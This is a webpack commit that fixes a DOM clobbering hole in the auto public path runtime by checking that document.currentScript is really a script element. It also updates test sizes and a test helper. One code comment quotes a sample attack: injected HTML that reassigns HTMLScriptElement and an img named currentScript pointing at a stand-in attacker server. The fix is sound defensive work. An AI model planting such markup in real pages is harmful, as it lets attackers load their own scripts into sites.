security: fix DOM clobbering in auto public path

webpack · Aug 22, 2024 · 955e057 · 955e057
2 parents 5ac3d7f + 9822387
commit 955e057
Show file tree

Hide file tree

Showing 3 changed files with 9 additions and 5 deletions.
diff --git a/lib/runtime/AutoPublicPathRuntimeModule.js b/lib/runtime/AutoPublicPathRuntimeModule.js
@@ -50,7 +50,10 @@ class AutoPublicPathRuntimeModule extends RuntimeModule {
 						`var document = ${RuntimeGlobals.global}.document;`,
 						"if (!scriptUrl && document) {",
 						Template.indent([
-							"if (document.currentScript)",
+							// Technically we could use `document.currentScript instanceof window.HTMLScriptElement`,
+							// but an attacker could try to inject `<script>HTMLScriptElement = HTMLImageElement</script>`
+							// and use `<img name="currentScript" src="https://attacker.controlled.server/"></img>`
+							"if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT')",
 							Template.indent("scriptUrl = document.currentScript.src;"),
 							"if (!scriptUrl) {",
 							Template.indent([

diff --git a/test/Stats.test.js b/test/Stats.test.js
@@ -190,10 +190,10 @@ describe("Stats", () => {
 			      "assets": Array [
 			        Object {
 			          "name": "entryB.js",
-			          "size": 3010,
+			          "size": 3060,
 			        },
 			      ],
-			      "assetsSize": 3010,
+			      "assetsSize": 3060,
 			      "auxiliaryAssets": undefined,
 			      "auxiliaryAssetsSize": 0,
 			      "childAssets": undefined,
@@ -238,10 +238,10 @@ describe("Stats", () => {
 			      "info": Object {
 			        "javascriptModule": false,
 			        "minimized": true,
-			        "size": 3010,
+			        "size": 3060,
 			      },
 			      "name": "entryB.js",
-			      "size": 3010,
+			      "size": 3060,
 			      "type": "asset",
 			    },
 			    Object {

diff --git a/test/helpers/CurrentScript.js b/test/helpers/CurrentScript.js
@@ -2,6 +2,7 @@ class CurrentScript {
 	constructor(path = "", type = "text/javascript") {
 		this.src = `https://test.cases/path/${path}index.js`;
 		this.type = type;
+		this.tagName = "script";
 	}
 }